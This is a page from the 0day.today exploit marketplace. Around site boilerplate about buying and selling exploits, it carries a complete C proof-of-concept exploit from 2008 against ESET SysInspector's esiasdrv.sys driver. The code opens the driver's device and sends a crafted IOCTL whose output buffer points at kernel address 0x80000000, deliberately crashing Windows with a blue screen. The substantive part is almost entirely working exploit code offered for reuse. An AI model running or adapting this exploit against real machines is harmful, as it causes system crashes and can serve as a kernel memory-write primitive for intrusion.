0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit
================================================================== ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit ================================================================== //////////////////////////////////////////////////////////////////////////////////// // +----------------------------------------------------------------------------+ // // | | // // | ESET, LLC. - http://www.eset.com/ | // // | | // // | Affected Software: | // // | ESET System Analyzer Tool - 1.1.1.0 | // // | | // // | Affected Driver: | // // | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys | // // | Proof of Concept Exploit | // // | | // // +----------------------------------------------------------------------------+ // // | | // // | NT Internals - http://www.ntinternals.org/ | // // | alex ntinternals org | // // | 01 October 2008 | // // | | // // +----------------------------------------------------------------------------+ // //////////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <stdlib.h> #include <windows.h> #define IMP_VOID __declspec(dllimport) VOID __stdcall #define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall #define OBJ_CASE_INSENSITIVE 0x00000040 #define FILE_OPEN_IF 0x00000003 #define IOCTL_METHOD_NEIGHTER 0x00223C1F #define BUFFER_LENGTH 0x04 typedef ULONG NTSTATUS; typedef struct _UNICODE_STRING { /* 0x00 */ USHORT Length; /* 0x02 */ USHORT MaximumLength; /* 0x04 */ PWSTR Buffer; /* 0x08 */ } UNICODE_STRING, *PUNICODE_STRING, **PPUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { /* 0x00 */ ULONG Length; /* 0x04 */ HANDLE RootDirectory; /* 0x08 */ PUNICODE_STRING ObjectName; /* 0x0C */ ULONG Attributes; /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor; /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; /* 0x18 */ } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES; typedef struct _IO_STATUS_BLOCK { union { /* 0x00 */ NTSTATUS Status; /* 0x00 */ PVOID Pointer; }; /* 0x04 */ ULONG Information; /* 0x08 */ } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK, **PPIO_STATUS_BLOCK; typedef VOID (NTAPI *PIO_APC_ROUTINE) ( IN PVOID ApcContext, IN PIO_STATUS_BLOCK IoStatusBlock, IN ULONG Reserved ); IMP_VOID RtlInitUnicodeString ( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); IMP_SYSCALL NtCreateFile ( OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN PLARGE_INTEGER AllocationSize OPTIONAL, IN ULONG FileAttributes, IN ULONG ShareAccess, IN ULONG CreateDisposition, IN ULONG CreateOptions, IN PVOID EaBuffer OPTIONAL, IN ULONG EaLength ); IMP_SYSCALL NtDeviceIoControlFile ( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ); IMP_SYSCALL NtDelayExecution ( IN BOOLEAN Alertable, IN PLARGE_INTEGER Interval ); IMP_SYSCALL NtClose ( IN HANDLE Handle ); int __cdecl main(int argc, char **argv) { NTSTATUS NtStatus; HANDLE DeviceHandle; ULONG InputBuffer; UNICODE_STRING DeviceName; OBJECT_ATTRIBUTES ObjectAttributes; IO_STATUS_BLOCK IoStatusBlock; LARGE_INTEGER Interval; /////////////////////////////////////////////////////////////////////////////////////////////// system("cls"); printf( " +----------------------------------------------------------------------------+\n" " | |\n" " | ESET, LLC. - http://www.eset.com/ |\n" " | |\n" " | Affected Software: |\n" " | ESET System Analyzer Tool - 1.1.1.0 |\n" " | |\n" " | Affected Driver: |\n" " | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys |\n" " | Proof of Concept Exploit |\n" " | |\n" " +----------------------------------------------------------------------------+\n" " | |\n" " | NT Internals - http://www.ntinternals.org/ |\n" " | alex ntinternals org |\n" " | 01 October 2008 |\n" " | |\n" " +----------------------------------------------------------------------------+\n\n"); /////////////////////////////////////////////////////////////////////////////////////////////// RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv"); ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES); ObjectAttributes.RootDirectory = 0; ObjectAttributes.ObjectName = &DeviceName; ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; ObjectAttributes.SecurityDescriptor = NULL; ObjectAttributes.SecurityQualityOfService = NULL; NtStatus = NtCreateFile( &DeviceHandle, // FileHandle FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess &ObjectAttributes, // ObjectAttributes &IoStatusBlock, // IoStatusBlock NULL, // AllocationSize OPTIONAL 0, // FileAttributes FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess FILE_OPEN_IF, // CreateDisposition 0, // CreateOptions NULL, // EaBuffer OPTIONAL 0); // EaLength /* if(NtStatus) { printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus); return NtStatus; } */ Interval.LowPart = 0xFF676980; Interval.HighPart = 0xFFFFFFFF; printf("\n 3"); NtDelayExecution(FALSE, &Interval); printf(" 2"); NtDelayExecution(FALSE, &Interval); printf(" 1"); NtDelayExecution(FALSE, &Interval); printf(" Upss\n\n"); NtDelayExecution(FALSE, &Interval); // // Choose type of BSoD // // InputBuffer = 0x12345678; InputBuffer = 0; NtStatus = NtDeviceIoControlFile( DeviceHandle, // FileHandle NULL, // Event NULL, // ApcRoutine NULL, // ApcContext &IoStatusBlock, // IoStatusBlock IOCTL_METHOD_NEIGHTER, // FsControlCode &InputBuffer, // InputBuffer BUFFER_LENGTH, // InputBufferLength (PVOID)0x80000000, // OutputBuffer BUFFER_LENGTH); // OutBufferLength if(NtStatus) { printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus); return NtStatus; } NtStatus = NtClose(DeviceHandle); // Handle if(NtStatus) { printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus); return NtStatus; } return FALSE; } # 0day.today [2024-12-25] #